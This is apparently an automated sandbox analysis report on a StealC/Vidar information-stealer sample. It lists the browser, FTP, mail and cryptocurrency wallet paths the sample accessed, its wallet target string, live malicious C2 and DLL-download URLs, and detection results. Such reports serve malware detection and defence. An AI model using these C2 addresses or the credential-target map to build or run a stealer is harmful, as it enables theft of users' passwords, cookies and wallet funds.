Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: Process Memory Space: bfb8bb0dc7.exe PID: 3152, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 00000024.00000002.3089031616.000000000275A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3085791494.0000000002727000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: bfb8bb0dc7.exe PID: 3152, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bfb8bb0dc7.exe PID: 9104, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: bfb8bb0dc7.exe PID: 3152, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C830C40 sqlite3_bind_zeroblob,	11_2_6C830C40
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C830D60 sqlite3_bind_parameter_name,	11_2_6C830D60
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C758EA0 sqlite3_clear_bindings,	11_2_6C758EA0

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.186.68	www.google.com	United States	15169	GOOGLEUS	false
142.250.185.129	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
85.28.47.31	unknown	Russian Federation	31643	GES-ASRU	true
18.65.39.85	services.addons.mozilla.org	United States	3	MIT-GATEWAYSUS	false
13.107.246.60	s-part-0032.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
34.117.188.166	contile.services.mozilla.com	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
142.250.185.142	unknown	United States	15169	GOOGLEUS	false
34.120.208.123	telemetry-incoming.r53-2.services.mozilla.com	United States	15169	GOOGLEUS	false
13.107.246.73	s-part-0045.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
94.245.104.56	ssl.bingadsedgeextension-prod-europe.azurewebsites.net	United Kingdom	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
185.215.113.19	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
34.149.100.209	prod.remote-settings.prod.webservices.mozgcp.net	United States	2686	ATGS-MMD-ASUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
34.107.221.82	prod.detectportal.prod.cloudops.mozgcp.net	United States	15169	GOOGLEUS	false
35.244.181.201	prod.balrog.prod.cloudops.mozgcp.net	United States	15169	GOOGLEUS	false
13.32.99.17	mitmdetection.services.mozilla.com	United States	16509	AMAZON-02US	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
35.190.72.216	prod.classify-client.prod.webservices.mozgcp.net	United States	15169	GOOGLEUS	false
34.160.144.191	prod.content-signature-chains.prod.webservices.mozgcp.net	United States	2686	ATGS-MMD-ASUS	false

Private

IP
192.168.2.9
192.168.2.6
127.0.0.1

Contacted Domains

Name	IP	Active
example.org	93.184.215.14	true
prod.detectportal.prod.cloudops.mozgcp.net	34.107.221.82	true
services.addons.mozilla.org	18.65.39.85	true
mitmdetection.services.mozilla.com	13.32.99.17	true
contile.services.mozilla.com	34.117.188.166	true
prod.content-signature-chains.prod.webservices.mozgcp.net	34.160.144.191	true
us-west1.prod.sumo.prod.webservices.mozgcp.net	34.149.128.2	true
ipv4only.arpa	192.0.0.170	true
prod.ads.prod.webservices.mozgcp.net	34.117.188.166	true
www.google.com	142.250.186.68	true
star-mini.c10r.facebook.com	157.240.251.35	true
prod.classify-client.prod.webservices.mozgcp.net	35.190.72.216	true
prod.balrog.prod.cloudops.mozgcp.net	35.244.181.201	true
twitter.com	104.244.42.129	true
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	94.245.104.56	true
dyna.wikimedia.org	185.15.59.224	true
prod.remote-settings.prod.webservices.mozgcp.net	34.149.100.209	true
s-part-0045.t-0009.t-msedge.net	13.107.246.73	true
sni1gl.wpc.nucdn.net	152.199.21.175	true
youtube-ui.l.google.com	172.217.18.14	true
play.google.com	142.250.186.110	true
www3.l.google.com	142.250.184.206	true
reddit.map.fastly.net	151.101.65.140	true
googlehosted.l.googleusercontent.com	142.250.185.129	true
s-part-0032.t-0009.t-msedge.net	13.107.246.60	true
telemetry-incoming.r53-2.services.mozilla.com	34.120.208.123	true
www.reddit.com	unknown	unknown
spocs.getpocket.com	unknown	unknown
clients2.googleusercontent.com	unknown	unknown
content-signature-2.cdn.mozilla.net	unknown	unknown
support.mozilla.org	unknown	unknown
firefox.settings.services.mozilla.com	unknown	unknown
push.services.mozilla.com	unknown	unknown
www.youtube.com	unknown	unknown
www.facebook.com	unknown	unknown
detectportal.firefox.com	unknown	unknown
bzib.nelreports.net	unknown	unknown
accounts.youtube.com	unknown	unknown
18.31.95.13.in-addr.arpa	unknown	unknown
shavar.services.mozilla.com	unknown	unknown
www.wikipedia.org	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://85.28.47.31/8405906461a5200c/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.19/Vi9leo/index.php	true	Avira URL Cloud: malware	unknown
http://85.28.47.31/8405906461a5200c/softokn3.dll	true	Avira URL Cloud: malware	unknown
http://85.28.47.31/8405906461a5200c/nss3.dll	true	Avira URL Cloud: malware	unknown
https://www.google.com/favicon.ico	false	Avira URL Cloud: safe	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 6SoKuOqyNh.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://85.28.47.31/8405906461a5200c/mozglue.dll~	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/softokn3.dll5	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/freebl3.dlll	Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.php	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/nss3.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/5499d72b3a3e55be.php/B	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000B.00000002.3085791494.0000000002727000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: StealC {"C2 url": "http://85.28.47.31/5499d72b3a3e55be.php"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe	ReversingLabs: Detection: 37%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	ReversingLabs: Detection: 37%
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	ReversingLabs: Detection: 52%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\1000003002\d27375200a.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 6SoKuOqyNh.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_00409BB0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	11_2_00409BB0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_00418940 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	11_2_00418940
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0040C660 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	11_2_0040C660
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_00407280 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	11_2_00407280
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_00409B10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	11_2_00409B10
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C656C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	11_2_6C656C80

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Unpacked PE file: 11.2.bfb8bb0dc7.exe.400000.0.unpack
Source: C:\Users\user\1000003002\d27375200a.exe	Unpacked PE file: 12.2.d27375200a.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Unpacked PE file: 36.2.bfb8bb0dc7.exe.400000.0.unpack
Source: C:\Users\user\1000003002\d27375200a.exe	Unpacked PE file: 37.2.d27375200a.exe.400000.0.unpack

Uses 32bit PE files

Source: 6SoKuOqyNh.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.95.31.18:443 -> 192.168.2.6:58976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.6:58977 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:58978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.6:58979 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.6:58980 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:59007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:59023 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:59033 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.76:443 -> 192.168.2.6:59081 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.159.68:443 -> 192.168.2.6:59082 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.42.73.29:443 -> 192.168.2.6:59084 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.42.73.29:443 -> 192.168.2.6:59086 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:59087 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:59096 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:59099 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.42.73.29:443 -> 192.168.2.6:59102 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.6:59101 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.65.39.85:443 -> 192.168.2.6:59100 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:59117 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:59119 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:59120 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:59118 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:59123 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:59152 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:59155 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59162 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59160 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59159 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59158 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59169 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59168 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:63406 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63456 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63455 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63454 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63457 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63458 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63453 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63460 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63459 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:63461 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:63514 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.189.173.27:443 -> 192.168.2.6:63518 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:63649 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59316 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59312 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59317 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59315 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59313 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59314 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59320 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59318 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:59319 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:59333 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: bfb8bb0dc7.exe, 0000000B.00000002.3127973139.000000006C6BD000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: freebl3.pdb source: freebl3.dll.11.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.11.dr
Source:	Binary string: nss3.pdb@ source: bfb8bb0dc7.exe, 0000000B.00000002.3130539225.000000006C87F000.00000002.00000001.01000000.00000014.sdmp, nss3[1].dll.11.dr
Source:	Binary string: z:\task_1551543573\build\openh264\gmpopenh264.pdbV source: firefox.exe, 00000016.00000003.3426978382.0000018948100000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb@ source: softokn3.dll.11.dr
Source:	Binary string: z:\task_1551543573\build\openh264\gmpopenh264.pdb source: firefox.exe, 00000016.00000003.3426978382.0000018948100000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.11.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.11.dr, msvcp140.dll.11.dr
Source:	Binary string: nss3.pdb source: bfb8bb0dc7.exe, 0000000B.00000002.3130539225.000000006C87F000.00000002.00000001.01000000.00000014.sdmp, nss3[1].dll.11.dr
Source:	Binary string: mozglue.pdb source: bfb8bb0dc7.exe, 0000000B.00000002.3127973139.000000006C6BD000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: softokn3.pdb source: softokn3.dll.11.dr

